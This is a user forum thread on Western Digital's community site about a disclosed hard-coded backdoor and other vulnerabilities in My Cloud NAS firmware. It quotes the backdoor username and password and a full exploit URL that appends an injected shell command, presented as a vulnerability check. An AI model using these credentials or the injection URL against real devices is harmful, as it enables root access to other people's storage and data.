I came across this story today about a major security concern for My Cloud devices. This backdoor allows root access through the internet:
Uses username mydlinkBRionyg and password abc12345cba and apparently has not been patched, despite being known for over 6 months.
When will this be patched, and what is the official recommendation until it has been patched to keep our data secure?
Here is a link to the GulfTech article that outlines several security issues with the My Cloud devices, including the backdoor:
The tatest firmware update Still have This critical security issue.
Itâs urgent a fix for This. The customers trust in WD, until now.
How can WD live with This?
My EX2 Ultra will be unplugged until WD comes back with a satisfactory solution or response clearly indicating why the report is incorrect or does not apply to this model. Considering WDâs superb QA on the hardware side, itâs really disappointing to see how poor it is on the software side, especially as it relates to end-user data security. On top of that, it looks as if the staff copied dlink code. It just looks terribly sloppy and I donât know if I should place any trust in this brand anymore. Too badâŠ
In the meantime, is there any way to use this device without network access? Is there a way to access the files directly through USB?
Thanks
Guys, can you test what happens if you try to login to a firmware with version equal or lower than 2.30.165 with username mydlinkBRionyg and password abc12345cba ?
Because on version 2.30.174 it doesnât work.
Hi,
You do not log into the user login with the credentials. What you do is visit a URI like the one below, or have an internet exposed NAS:
http://yourhost/cgi-bin/nas_sharing.cgi?dbg=1&cmd=51&user=mydlinkBRionyg&passwd=YWJjMT
IzNDVjYmE&start=1&count=1;touch+/tmp/gulftech;
You will know you are vulnerable if a file exists in /tmp/ named âgulftechâ
WDMyCloud <= 2.30.165 is vulnerable. 2.30.174 is not.
Hi,
Thank you for clarification!
So did 2.30.174 patch all those discovered vulnerabilities? For me this is not 100% clear from reading the changelog:
Discovered vulnerabilities:
01 - Unrestricted file upload
01.1 - Vulnerable code analysis
01.2 - Remote exploitation
02 - Hard coded backdoor
02.1 - Vulnerable code analysis
02.2 - Remote exploitation
03 - Miscellaneous security issues
03.1 - Cross site request forgery
03.2 - Command injection
03.3 - Denial of service
03.4 - Information disclosure
Thank you for your effort. This is a never-ending nightmare and the situation is still confusing to me. Spending my sunday afternoon, trying to figure out how big of a risk there is to my data.
Gulftech.org now added 2.30.174 as ânot vulnerableâ ? However on 2.30.174 some things still look unpatched:
01 - Unrestricted file upload â Content of multi_uploadify.php looks unchanged to me / probably vulnerable
02 - Hard coded backdoor â Were not able to reproduce / probably not vulnerable
03.1 - Cross site request forgery â Were not able to reproduce / probably not vulnerable
03.2 - Command injection â no idea
03.3 - Denial of service â Reproducable / vulnerable
03.4 - Information disclosure â Reproducable / vulnerable
Created a support case with WD to get an official feedback. After creation I got the message âYou will love your WD productâ. No words for this.
What about they firmware 2.11.168 of Mycloud EX2?
Sooooo Whats the point WD guys??? Fix this thing quick!!
When will this critical security issues be fixed on the EX2 ? they are still exploitable. I am alarmed by this carelessness leaving thousands of WD devices exploitable⊠This is not how you should treat your customers.
| Forums | News and Announcements | Register | Help | Forum Guidelines |
Copyright © 2021 Western Digital Technologies, Inc. All rights
reserved.
|
Trademarks
|
Privacy
|
Community Terms of Service
|
Site Terms of Use
|
Copyright
|
Contact WD
|